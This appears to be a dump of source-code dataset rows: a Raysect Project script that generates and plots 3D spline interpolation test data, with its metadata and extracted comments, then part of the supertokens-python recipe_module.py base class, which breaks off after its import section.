zsamples_lower_and_upper = np.concatenate((np.linspace(Z_LOWER - (Z_UPPER - Z_LOWER) * lower_p, Z_LOWER, n_lower)[
:-1], zsamples_lower_and_upper,
np.linspace(Z_UPPER, Z_UPPER + (Z_UPPER - Z_LOWER) * lower_p, n_lower)[
1:]))
index_ysamples_lower_upper = np.where(x_in[index_y_in] == ysamples_lower_and_upper)[0].item()
# extrapolation to save
f_extrapolation_output = np.zeros((len(xsamples_extrapolation), ))
for i in range(len(xsamples_extrapolation)):
f_extrapolation_output[i] = interpolator3D(
xsamples_extrapolation[i], ysamples_extrapolation[i], zsamples_extrapolation[i]
)
if verbose_options[1]:
print('Output of extrapolation to be saved:\n', repr(f_extrapolation_output))
check_plot = True
if check_plot:
import matplotlib.pyplot as plt
from matplotlib import cm
# Install mayavi and pyQt5
main_plots_on = True
if main_plots_on:
fig, ax = plt.subplots(1, 4)
fig1, ax1 = plt.subplots(1, 2)
if not (x_in[index_x_in] == xsamples).any():
raise ValueError(
f'To compare a slice, NB_XSAMPLES={NB_XSAMPLES}-1, NB_YSAMPLES={NB_YSAMPLES}-1, NB_ZSAMPLES='
f'{NB_ZSAMPLES}-1 must be divisible by NB_X={NB_X}-1, NB_Y={NB_Y}-1, NB_Z={NB_Z}-1'
)
if not (y_in[index_y_in] == ysamples_lower_and_upper).any():
raise ValueError(
f'To compare a slice, NB_XSAMPLES={NB_XSAMPLES}-1, NB_YSAMPLES={NB_YSAMPLES}-1, NB_ZSAMPLES='
f'{NB_ZSAMPLES}-1 must be divisible by NB_X={NB_X}-1, NB_Y={NB_Y}-1, NB_Z={NB_Z}-1'
)
index_xsamples = np.where(x_in[index_x_in] == xsamples)[0].item()
index_ysamples_lower_upper = np.where(y_in[index_y_in] == ysamples_lower_and_upper)[0].item()
# index_ysamples_lower_upper = 0
# index_zsamples_lower_upper = 0
index_zsamples_lower_upper = np.where(z_in[index_z_in] == zsamples_lower_and_upper)[0].item()
f_plot_x = f_in[index_x_in, :, :]
y_corners_x = pcolourmesh_corners(y_in)
z_corners_x = pcolourmesh_corners(z_in)
min_colourmap = np.min(f_in)
max_colourmap = np.max(f_in)
if log_scale:
c_norm = SymLogNorm(vmin=min_colourmap, vmax=max_colourmap, linthresh=0.03)
else:
c_norm = Normalize(vmin=min_colourmap, vmax=max_colourmap)
colourmap = cm.get_cmap('viridis', 512)
ax[0].pcolormesh(y_corners_x, z_corners_x, f_plot_x, norm=c_norm, cmap='viridis')
# ax[0].pcolormesh(y_in, z_in, f_plot_x)
ax[0].set_aspect('equal')
f_out = np.zeros((len(xsamples), len(ysamples), len(zsamples)))
for i in range(len(xsamples)):
for j in range(len(ysamples)):
for k in range(len(zsamples)):
f_out[i, j, k] = interpolator3D(xsamples[i], ysamples[j], zsamples[k])
if verbose_options[2]:
print('Test interpolation:\n', repr(f_out))
f_out_lower_and_upper = np.zeros((len(xsamples_lower_and_upper), len(ysamples_lower_and_upper),
len(zsamples_lower_and_upper)))
for i in range(len(xsamples_lower_and_upper)):
for j in range(len(ysamples_lower_and_upper)):
for k in range(len(zsamples_lower_and_upper)):
f_out_lower_and_upper[i, j, k] = interpolator3D(
xsamples_lower_and_upper[i], ysamples_lower_and_upper[j], zsamples_lower_and_upper[k]
)
f_out_extrapolation = np.zeros((len(xsamples_extrapolation), ))
for i in range(len(xsamples_extrapolation)):
f_out_extrapolation[i] = interpolator3D(
xsamples_extrapolation[i], ysamples_extrapolation[i], zsamples_extrapolation[i]
)
if verbose_options[3]:
print('New output of extrapolation to be saved:\n', repr(f_out_extrapolation))
index_xsamples_extrap = np.where(x_in[index_x_in] == xsamples_extrapolation)
f_out_x_extrapolation = f_out_extrapolation[index_xsamples_extrap]
im = ax[3].scatter(
ysamples_extrapolation[index_xsamples_extrap], zsamples_extrapolation[index_xsamples_extrap],
c=f_out_x_extrapolation, norm=c_norm, cmap='viridis', s=10
)
ax[3].set_aspect('equal')
f_out_x = f_out[index_xsamples, :, :]
ysamples_mesh, zsamples_mesh = np.meshgrid(ysamples, zsamples)
ax[0].scatter(
ysamples_mesh.ravel(), zsamples_mesh.ravel(), c=f_out_x.ravel(), norm=c_norm, cmap='viridis', s=10
)
index_y_print = -1
index_z_print = 0
index_ysamples_print = np.where(y_in[index_y_print] == ysamples)[0].item()
index_zsamples_print = np.where(z_in[index_z_print] == zsamples)[0].item()
ax[0].set_title('Slice of x', size=20)
ax[1].set_title(f'Interpolated points \nin slice of x={x_in[index_x_in]}', size=20)
y_corners_xsamples = pcolourmesh_corners(ysamples)
z_corners_xsamples = pcolourmesh_corners(zsamples)
im2 = ax[1].pcolormesh(y_corners_xsamples, z_corners_xsamples, f_out_x, norm=c_norm, cmap='viridis')
ax[1].set_aspect('equal')
if not (x_in[index_x_in] == xsamples_lower_and_upper).any():
raise ValueError(
f'To compare a slice, n_lower_upper={n_lower}-1, must be divisible by NB_X={NB_X}-1, NB_Y={NB_Y}-1,'
f' NB_Z={NB_Z}-1'
)
index_xsamples_lower_and_upper = np.where(x_in[index_x_in] == xsamples_lower_and_upper)[0].item()
y_corners_xsamples_lower_and_upper = pcolourmesh_corners(ysamples_lower_and_upper)
z_corners_xsamples_lower_and_upper = pcolourmesh_corners(zsamples_lower_and_upper)
f_out_lower_and_upper_x = f_out_lower_and_upper[index_xsamples_lower_and_upper, :, :]
im3 = ax[2].pcolormesh(
y_corners_xsamples_lower_and_upper, z_corners_xsamples_lower_and_upper, f_out_lower_and_upper_x,
norm=c_norm, cmap='viridis'
)
check_array_z = np.zeros(len(zsamples_lower_and_upper))
check_array_y = np.zeros(len(ysamples_lower_and_upper))
for i in range(len(zsamples_lower_and_upper)):
check_array_z[i] = interpolator3D(
x_in[index_x_in], ysamples_lower_and_upper[index_ysamples_lower_upper], zsamples_lower_and_upper[i]
)
check_array_y[i] = interpolator3D(
x_in[index_x_in], ysamples_lower_and_upper[i], zsamples_lower_and_upper[index_zsamples_lower_upper]
)
ax1[0].plot(zsamples_lower_and_upper, f_out_lower_and_upper_x[index_ysamples_lower_upper, :])
ax1[0].plot(z_in, f_in[index_x_in, index_y_in, :], 'bo')
ax1[0].plot(zsamples_lower_and_upper, check_array_z, 'gx')
ax1[1].plot(ysamples_lower_and_upper, check_array_y)
# ax1[1].plot(ysamples_lower_and_upper, f_out_lower_and_upper_x[:, index_z_plot])
ax1[0].axvline(z_in[0], color='r', linestyle='--')
ax1[0].axvline(z_in[-1], color='r', linestyle='--')
ax1[1].axvline(y_in[0], color='r', linestyle='--')
ax1[1].axvline(y_in[-1], color='r', linestyle='--')
fig.colorbar(im, ax=ax[0])
fig.colorbar(im2, ax=ax[1])
fig.colorbar(im3, ax=ax[2])
ax[2].set_aspect('equal')
plt.show()
| <filename>raysect/core/math/function/float/function3d/interpolate/tests/scripts/generate_3d_splines.py
# Copyright (c) 2014-2021, Dr <NAME>, Raysect Project
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the Raysect Project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import numpy as np
from raysect.core.math.function.float.function3d.interpolate.interpolator3darray import Interpolator3DArray
from matplotlib.colors import SymLogNorm, Normalize
import scipy
import sys
from raysect.core.math.function.float.function3d.interpolate.tests.data.interpolator3d_test_data import \
TestInterpolatorLoadBigValues, TestInterpolatorLoadNormalValues, TestInterpolatorLoadSmallValues,\
TestInterpolatorLoadBigValuesUneven, TestInterpolatorLoadNormalValuesUneven, TestInterpolatorLoadSmallValuesUneven
from raysect.core.math.function.float.function3d.interpolate.tests.test_interpolator_3d import X_LOWER, X_UPPER,\
NB_XSAMPLES, NB_X, X_EXTRAP_DELTA_MAX, PRECISION, Y_LOWER, Y_UPPER, NB_YSAMPLES, NB_Y, \
Y_EXTRAP_DELTA_MAX, EXTRAPOLATION_RANGE, large_extrapolation_range, Z_LOWER, Z_UPPER, \
NB_ZSAMPLES, NB_Z, Z_EXTRAP_DELTA_MAX, N_EXTRAPOLATION, uneven_linspace
# Force scientific format to get the right number of significant figures
np.set_printoptions(30000, linewidth=100, formatter={'float': lambda x_str: format(x_str, '.'+str(PRECISION)+'E')},
threshold=sys.maxsize)
# Overwrite imported values here.
VISUAL_NOT_TESTS = False
if VISUAL_NOT_TESTS:
NB_X = 51
NB_Y = 51
NB_Z = 51
NB_XSAMPLES = 101
NB_YSAMPLES = 101
NB_ZSAMPLES = 101
X_EXTRAP_DELTA_MIN = 0.04
Y_EXTRAP_DELTA_MIN = 0.04
Z_EXTRAP_DELTA_MIN = 0.04
BIG_VALUE_FACTOR = 20.
SMALL_VALUE_FACTOR = -20.
def docstring_test():
"""
.. code-block:: python
>>> from raysect.core.math.function.float.function3d.interpolate.interpolator3darray import Interpolator3DArray
>>>
>>> x = np.linspace(-1., 1., 20)
>>> y = np.linspace(-1., 1., 20)
>>> z = np.linspace(-1., 1., 20)
>>> x_array, y_array, z_array = np.meshgrid(x, y, z, indexing='ij')
>>> f = np.exp(-(x_array**2 + y_array**2 + z_array**2))
>>> interpolator3D = Interpolator3DArray(x, y, z, f, 'cubic', 'nearest', 1.0, 1.0, 1.0)
>>> # Interpolation
>>> interpolator3D(1.0, 1.0, 0.2)
0.1300281183136766
>>> # Extrapolation
>>> interpolator3D(1.0, 1.0, 1.1)
0.0497870683678659
>>> # Extrapolation out of bounds
>>> interpolator3D(1.0, 1.0, 2.1)
ValueError: The specified value (z=2.1) is outside of extrapolation range.
"""
pass
def get_extrapolation_input_values(
x_lower, x_upper, y_lower, y_upper, z_lower, z_upper, x_extrap_delta_max, y_extrap_delta_max,
z_extrap_delta_max, x_extrap_delta_min, y_extrap_delta_min, z_extrap_delta_min):
xsamples_extrap_out_of_bounds_options = np.array(
[x_lower - x_extrap_delta_max, (x_lower + x_upper) / 2., x_upper + x_extrap_delta_max])
ysamples_extrap_out_of_bounds_options = np.array(
[y_lower - y_extrap_delta_max, (y_lower + y_upper) / 2., y_upper + y_extrap_delta_max])
zsamples_extrap_out_of_bounds_options = np.array(
[z_lower - z_extrap_delta_max, (z_lower + z_upper) / 2., z_upper + z_extrap_delta_max])
xsamples_extrap_in_bounds_options = np.array(
[x_lower - x_extrap_delta_min, (x_lower + x_upper) / 2., x_upper + x_extrap_delta_min])
ysamples_extrap_in_bounds_options = np.array(
[y_lower - y_extrap_delta_min, (y_lower + y_upper) / 2., y_upper + y_extrap_delta_min])
zsamples_extrap_in_bounds_options = np.array(
[z_lower - z_extrap_delta_min, (z_lower + z_upper) / 2., z_upper + z_extrap_delta_min])
xsamples_extrap_out_of_bounds = []
ysamples_extrap_out_of_bounds = []
zsamples_extrap_out_of_bounds = []
xsamples_extrap_in_bounds = []
ysamples_extrap_in_bounds = []
zsamples_extrap_in_bounds = []
edge_indicies_x = [0, len(xsamples_extrap_out_of_bounds_options) - 1]
edge_indicies_y = [0, len(ysamples_extrap_out_of_bounds_options) - 1]
edge_indicies_z = [0, len(zsamples_extrap_out_of_bounds_options) - 1]
for i_x in range(len(xsamples_extrap_out_of_bounds_options)):
for j_y in range(len(ysamples_extrap_out_of_bounds_options)):
for k_z in range(len(zsamples_extrap_out_of_bounds_options)):
if not (i_x not in edge_indicies_x and j_y not in edge_indicies_y and k_z not in edge_indicies_z):
xsamples_extrap_out_of_bounds.append(xsamples_extrap_out_of_bounds_options[i_x])
ysamples_extrap_out_of_bounds.append(ysamples_extrap_out_of_bounds_options[j_y])
zsamples_extrap_out_of_bounds.append(zsamples_extrap_out_of_bounds_options[k_z])
xsamples_extrap_in_bounds.append(xsamples_extrap_in_bounds_options[i_x])
ysamples_extrap_in_bounds.append(ysamples_extrap_in_bounds_options[j_y])
zsamples_extrap_in_bounds.append(zsamples_extrap_in_bounds_options[k_z])
return \
np.array(xsamples_extrap_out_of_bounds), np.array(ysamples_extrap_out_of_bounds), \
np.array(zsamples_extrap_out_of_bounds), np.array(xsamples_extrap_in_bounds), \
np.array(ysamples_extrap_in_bounds), np.array(zsamples_extrap_in_bounds)
def pcolourmesh_corners(input_array):
return np.concatenate((input_array[:-1] - np.diff(input_array)/2.,
np.array([input_array[-1] - (input_array[-1] - input_array[-2]) / 2.,
input_array[-1] + (input_array[-1] - input_array[-2]) / 2.])), axis=0)
def function_to_spline(x_input, y_input, z_input, factor_in):
t = np.pi * np.sqrt((x_input ** 2 + y_input ** 2 + z_input ** 2))
return factor_in*np.sinc(t)
if __name__ == '__main__':
# Calculate for big values, small values, or normal values
big_values = False
small_values = True
log_scale = False
uneven_spacing = False
use_saved_datastore_spline_knots = True
verbose_options = [False, True, False, False]
if VISUAL_NOT_TESTS:
index_x_in = 40
else:
index_x_in = 4
index_y_in = 0
index_z_in = 0
index_y_plot = 0
index_z_plot = 0
print('Using scipy version', scipy.__version__)
# Find the function values to be used
if big_values:
factor = np.power(10., BIG_VALUE_FACTOR)
elif small_values:
factor = np.power(10., SMALL_VALUE_FACTOR)
else:
factor = 1.
if uneven_spacing:
x_in = uneven_linspace(X_LOWER, X_UPPER, NB_X, offset_fraction=1./3.)
y_in = uneven_linspace(Y_LOWER, Y_UPPER, NB_Y, offset_fraction=1./3.)
z_in = uneven_linspace(Z_LOWER, Z_UPPER, NB_Z, offset_fraction=1./3.)
else:
x_in = np.linspace(X_LOWER, X_UPPER, NB_X)
y_in = np.linspace(Y_LOWER, Y_UPPER, NB_Y)
z_in = np.linspace(Z_LOWER, Z_UPPER, NB_Z)
x_in_full, y_in_full, z_in_full = np.meshgrid(x_in, y_in, z_in, indexing='ij')
f_in = function_to_spline(x_in_full, y_in_full, z_in_full, factor)
if use_saved_datastore_spline_knots:
if uneven_spacing:
if big_values:
reference_loaded_values = TestInterpolatorLoadBigValuesUneven()
elif small_values:
reference_loaded_values = TestInterpolatorLoadSmallValuesUneven()
else:
reference_loaded_values = TestInterpolatorLoadNormalValuesUneven()
else:
if big_values:
reference_loaded_values = TestInterpolatorLoadBigValues()
elif small_values:
reference_loaded_values = TestInterpolatorLoadSmallValues()
else:
reference_loaded_values = TestInterpolatorLoadNormalValues()
f_in = reference_loaded_values.data
if verbose_options[0]:
print('Save this to self.data in test_interpolator:\n', repr(f_in))
xsamples = np.linspace(X_LOWER, X_UPPER, NB_XSAMPLES)
ysamples = np.linspace(Y_LOWER, Y_UPPER, NB_YSAMPLES)
zsamples = np.linspace(Z_LOWER, Z_UPPER, NB_ZSAMPLES)
xsamples_extrapolation, ysamples_extrapolation, zsamples_extrapolation = large_extrapolation_range(
xsamples, ysamples, zsamples, EXTRAPOLATION_RANGE, N_EXTRAPOLATION
)
# # Extrapolation x and y values
xsamples_out_of_bounds, ysamples_out_of_bounds, zsamples_out_of_bounds, xsamples_in_bounds, ysamples_in_bounds, \
zsamples_in_bounds = get_extrapolation_input_values(
X_LOWER, X_UPPER, Y_LOWER, Y_UPPER, Z_LOWER, Z_UPPER, X_EXTRAP_DELTA_MAX, Y_EXTRAP_DELTA_MAX,
Z_EXTRAP_DELTA_MAX, X_EXTRAP_DELTA_MIN, Y_EXTRAP_DELTA_MIN, Z_EXTRAP_DELTA_MIN
)
interpolator3D = Interpolator3DArray(x_in, y_in, z_in, f_in, 'linear', 'linear', extrapolation_range_x=2.0,
extrapolation_range_y=2.0, extrapolation_range_z=2.0)
if VISUAL_NOT_TESTS:
n_lower_upper_interp = 51
else:
n_lower_upper_interp = 19
n_lower = 50
lower_p = 0.9
xsamples_lower_and_upper = np.linspace(X_LOWER, X_UPPER, n_lower_upper_interp)
ysamples_lower_and_upper = np.linspace(Y_LOWER, Y_UPPER, n_lower_upper_interp)
zsamples_lower_and_upper = np.linspace(Z_LOWER, Z_UPPER, n_lower_upper_interp)
xsamples_lower_and_upper = np.concatenate((np.linspace(X_LOWER - (X_UPPER - X_LOWER) * lower_p, X_LOWER, n_lower)[
:-1], xsamples_lower_and_upper,
np.linspace(X_UPPER, X_UPPER + (X_UPPER - X_LOWER) * lower_p, n_lower)[
1:]))
ysamples_lower_and_upper = np.concatenate((np.linspace(Y_LOWER - (Y_UPPER - Y_LOWER) * lower_p, Y_LOWER, n_lower)[
:-1], ysamples_lower_and_upper,
np.linspace(Y_UPPER, Y_UPPER + (Y_UPPER - Y_LOWER) * lower_p, n_lower)[
1:]))
zsamples_lower_and_upper = np.concatenate((np.linspace(Z_LOWER - (Z_UPPER - Z_LOWER) * lower_p, Z_LOWER, n_lower)[
:-1], zsamples_lower_and_upper,
np.linspace(Z_UPPER, Z_UPPER + (Z_UPPER - Z_LOWER) * lower_p, n_lower)[
1:]))
index_ysamples_lower_upper = np.where(x_in[index_y_in] == ysamples_lower_and_upper)[0].item()
# extrapolation to save
f_extrapolation_output = np.zeros((len(xsamples_extrapolation), ))
for i in range(len(xsamples_extrapolation)):
f_extrapolation_output[i] = interpolator3D(
xsamples_extrapolation[i], ysamples_extrapolation[i], zsamples_extrapolation[i]
)
if verbose_options[1]:
print('Output of extrapolation to be saved:\n', repr(f_extrapolation_output))
check_plot = True
if check_plot:
import matplotlib.pyplot as plt
from matplotlib import cm
# Install mayavi and pyQt5
main_plots_on = True
if main_plots_on:
fig, ax = plt.subplots(1, 4)
fig1, ax1 = plt.subplots(1, 2)
if not (x_in[index_x_in] == xsamples).any():
raise ValueError(
f'To compare a slice, NB_XSAMPLES={NB_XSAMPLES}-1, NB_YSAMPLES={NB_YSAMPLES}-1, NB_ZSAMPLES='
f'{NB_ZSAMPLES}-1 must be divisible by NB_X={NB_X}-1, NB_Y={NB_Y}-1, NB_Z={NB_Z}-1'
)
if not (y_in[index_y_in] == ysamples_lower_and_upper).any():
raise ValueError(
f'To compare a slice, NB_XSAMPLES={NB_XSAMPLES}-1, NB_YSAMPLES={NB_YSAMPLES}-1, NB_ZSAMPLES='
f'{NB_ZSAMPLES}-1 must be divisible by NB_X={NB_X}-1, NB_Y={NB_Y}-1, NB_Z={NB_Z}-1'
)
index_xsamples = np.where(x_in[index_x_in] == xsamples)[0].item()
index_ysamples_lower_upper = np.where(y_in[index_y_in] == ysamples_lower_and_upper)[0].item()
# index_ysamples_lower_upper = 0
# index_zsamples_lower_upper = 0
index_zsamples_lower_upper = np.where(z_in[index_z_in] == zsamples_lower_and_upper)[0].item()
f_plot_x = f_in[index_x_in, :, :]
y_corners_x = pcolourmesh_corners(y_in)
z_corners_x = pcolourmesh_corners(z_in)
min_colourmap = np.min(f_in)
max_colourmap = np.max(f_in)
if log_scale:
c_norm = SymLogNorm(vmin=min_colourmap, vmax=max_colourmap, linthresh=0.03)
else:
c_norm = Normalize(vmin=min_colourmap, vmax=max_colourmap)
colourmap = cm.get_cmap('viridis', 512)
ax[0].pcolormesh(y_corners_x, z_corners_x, f_plot_x, norm=c_norm, cmap='viridis')
# ax[0].pcolormesh(y_in, z_in, f_plot_x)
ax[0].set_aspect('equal')
f_out = np.zeros((len(xsamples), len(ysamples), len(zsamples)))
for i in range(len(xsamples)):
for j in range(len(ysamples)):
for k in range(len(zsamples)):
f_out[i, j, k] = interpolator3D(xsamples[i], ysamples[j], zsamples[k])
if verbose_options[2]:
print('Test interpolation:\n', repr(f_out))
f_out_lower_and_upper = np.zeros((len(xsamples_lower_and_upper), len(ysamples_lower_and_upper),
len(zsamples_lower_and_upper)))
for i in range(len(xsamples_lower_and_upper)):
for j in range(len(ysamples_lower_and_upper)):
for k in range(len(zsamples_lower_and_upper)):
f_out_lower_and_upper[i, j, k] = interpolator3D(
xsamples_lower_and_upper[i], ysamples_lower_and_upper[j], zsamples_lower_and_upper[k]
)
f_out_extrapolation = np.zeros((len(xsamples_extrapolation), ))
for i in range(len(xsamples_extrapolation)):
f_out_extrapolation[i] = interpolator3D(
xsamples_extrapolation[i], ysamples_extrapolation[i], zsamples_extrapolation[i]
)
if verbose_options[3]:
print('New output of extrapolation to be saved:\n', repr(f_out_extrapolation))
index_xsamples_extrap = np.where(x_in[index_x_in] == xsamples_extrapolation)
f_out_x_extrapolation = f_out_extrapolation[index_xsamples_extrap]
im = ax[3].scatter(
ysamples_extrapolation[index_xsamples_extrap], zsamples_extrapolation[index_xsamples_extrap],
c=f_out_x_extrapolation, norm=c_norm, cmap='viridis', s=10
)
ax[3].set_aspect('equal')
f_out_x = f_out[index_xsamples, :, :]
ysamples_mesh, zsamples_mesh = np.meshgrid(ysamples, zsamples)
ax[0].scatter(
ysamples_mesh.ravel(), zsamples_mesh.ravel(), c=f_out_x.ravel(), norm=c_norm, cmap='viridis', s=10
)
index_y_print = -1
index_z_print = 0
index_ysamples_print = np.where(y_in[index_y_print] == ysamples)[0].item()
index_zsamples_print = np.where(z_in[index_z_print] == zsamples)[0].item()
ax[0].set_title('Slice of x', size=20)
ax[1].set_title(f'Interpolated points \nin slice of x={x_in[index_x_in]}', size=20)
y_corners_xsamples = pcolourmesh_corners(ysamples)
z_corners_xsamples = pcolourmesh_corners(zsamples)
im2 = ax[1].pcolormesh(y_corners_xsamples, z_corners_xsamples, f_out_x, norm=c_norm, cmap='viridis')
ax[1].set_aspect('equal')
if not (x_in[index_x_in] == xsamples_lower_and_upper).any():
raise ValueError(
f'To compare a slice, n_lower_upper={n_lower}-1, must be divisible by NB_X={NB_X}-1, NB_Y={NB_Y}-1,'
f' NB_Z={NB_Z}-1'
)
index_xsamples_lower_and_upper = np.where(x_in[index_x_in] == xsamples_lower_and_upper)[0].item()
y_corners_xsamples_lower_and_upper = pcolourmesh_corners(ysamples_lower_and_upper)
z_corners_xsamples_lower_and_upper = pcolourmesh_corners(zsamples_lower_and_upper)
f_out_lower_and_upper_x = f_out_lower_and_upper[index_xsamples_lower_and_upper, :, :]
im3 = ax[2].pcolormesh(
y_corners_xsamples_lower_and_upper, z_corners_xsamples_lower_and_upper, f_out_lower_and_upper_x,
norm=c_norm, cmap='viridis'
)
check_array_z = np.zeros(len(zsamples_lower_and_upper))
check_array_y = np.zeros(len(ysamples_lower_and_upper))
for i in range(len(zsamples_lower_and_upper)):
check_array_z[i] = interpolator3D(
x_in[index_x_in], ysamples_lower_and_upper[index_ysamples_lower_upper], zsamples_lower_and_upper[i]
)
check_array_y[i] = interpolator3D(
x_in[index_x_in], ysamples_lower_and_upper[i], zsamples_lower_and_upper[index_zsamples_lower_upper]
)
ax1[0].plot(zsamples_lower_and_upper, f_out_lower_and_upper_x[index_ysamples_lower_upper, :])
ax1[0].plot(z_in, f_in[index_x_in, index_y_in, :], 'bo')
ax1[0].plot(zsamples_lower_and_upper, check_array_z, 'gx')
ax1[1].plot(ysamples_lower_and_upper, check_array_y)
# ax1[1].plot(ysamples_lower_and_upper, f_out_lower_and_upper_x[:, index_z_plot])
ax1[0].axvline(z_in[0], color='r', linestyle='--')
ax1[0].axvline(z_in[-1], color='r', linestyle='--')
ax1[1].axvline(y_in[0], color='r', linestyle='--')
ax1[1].axvline(y_in[-1], color='r', linestyle='--')
fig.colorbar(im, ax=ax[0])
fig.colorbar(im2, ax=ax[1])
fig.colorbar(im3, ax=ax[2])
ax[2].set_aspect('equal')
plt.show()
| en | 0.562232 | # Copyright (c) 2014-2021, Dr <NAME>, Raysect Project # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # 3. Neither the name of the Raysect Project nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # Force scientific format to get the right number of significant figures # Overwrite imported values here. .. code-block:: python >>> from raysect.core.math.function.float.function3d.interpolate.interpolator3darray import Interpolator3DArray >>> >>> x = np.linspace(-1., 1., 20) >>> y = np.linspace(-1., 1., 20) >>> z = np.linspace(-1., 1., 20) >>> x_array, y_array, z_array = np.meshgrid(x, y, z, indexing='ij') >>> f = np.exp(-(x_array**2 + y_array**2 + z_array**2)) >>> interpolator3D = Interpolator3DArray(x, y, z, f, 'cubic', 'nearest', 1.0, 1.0, 1.0) >>> # Interpolation >>> interpolator3D(1.0, 1.0, 0.2) 0.1300281183136766 >>> # Extrapolation >>> interpolator3D(1.0, 1.0, 1.1) 0.0497870683678659 >>> # Extrapolation out of bounds >>> interpolator3D(1.0, 1.0, 2.1) ValueError: The specified value (z=2.1) is outside of extrapolation range. # Calculate for big values, small values, or normal values # Find the function values to be used # # Extrapolation x and y values # extrapolation to save # Install mayavi and pyQt5 # index_ysamples_lower_upper = 0 # index_zsamples_lower_upper = 0 # ax[0].pcolormesh(y_in, z_in, f_plot_x) # ax1[1].plot(ysamples_lower_and_upper, f_out_lower_and_upper_x[:, index_z_plot]) | 1.473447 | 1 |
supertokens_python/recipe_module.py | girish946/supertokens-python | 36 | 8544 | # Copyright (c) 2021, VRAI Labs and/or its affiliates. All rights reserved.
#
# This software is licensed under the Apache License, Version 2.0 (the
# "License") as published by the Apache Software Foundation.
#
# You may not use this file except in compliance with the License. You may
# obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import annotations
import abc
from typing import Union, List, TYPE_CHECKING
try:
from typing import Literal
except ImportError:
from typing_extensions import Literal
from .framework.response import BaseResponse
if TYPE_CHECKING:
from supertokens_python.framework.request import BaseRequest
from .supertokens import AppInfo
from .normalised_url_path import NormalisedURLPath
from .exceptions import SuperTokensError
class RecipeModule(abc.ABC):
def __init__(self, recipe_id: str, app_info: AppInfo):
self.recipe_id = recipe_id
self.app_info = app_info
def get_recipe_id(self):
return self.recipe_id
def get_app_info(self):
return self.app_info
def return_api_id_if_can_handle_request(
self, path: NormalisedURLPath, method: str) -> Union[str, None]:
apis_handled = self.get_apis_handled()
for current_api in apis_handled:
if not current_api.disabled and current_api.method == method and self.app_info.api_base_path.append(
current_api.path_without_api_base_path).equals(path):
return current_api.request_id
return None
@abc.abstractmethod
def is_error_from_this_recipe_based_on_instance(self, err):
pass
@abc.abstractmethod
def get_apis_handled(self) -> List[APIHandled]:
pass
@abc.abstractmethod
async def handle_api_request(self, request_id: str, request: BaseRequest, path: NormalisedURLPath, method: str,
response: BaseResponse):
pass
@abc.abstractmethod
async def handle_error(self, request: BaseRequest, err: SuperTokensError, response: BaseResponse):
pass
@abc.abstractmethod
def get_all_cors_headers(self):
pass
class APIHandled:
def __init__(self, path_without_api_base_path: NormalisedURLPath,
method: Literal['post', 'get', 'delete', 'put', 'options', 'trace'], request_id: str, disabled: bool):
self.path_without_api_base_path = path_without_api_base_path
self.method = method
self.request_id = request_id
self.disabled = disabled
| # Copyright (c) 2021, VRAI Labs and/or its affiliates. All rights reserved.
#
# This software is licensed under the Apache License, Version 2.0 (the
# "License") as published by the Apache Software Foundation.
#
# You may not use this file except in compliance with the License. You may
# obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import annotations
import abc
from typing import Union, List, TYPE_CHECKING
try:
from typing import Literal
except ImportError:
from typing_extensions import Literal
from .framework.response import BaseResponse
if TYPE_CHECKING:
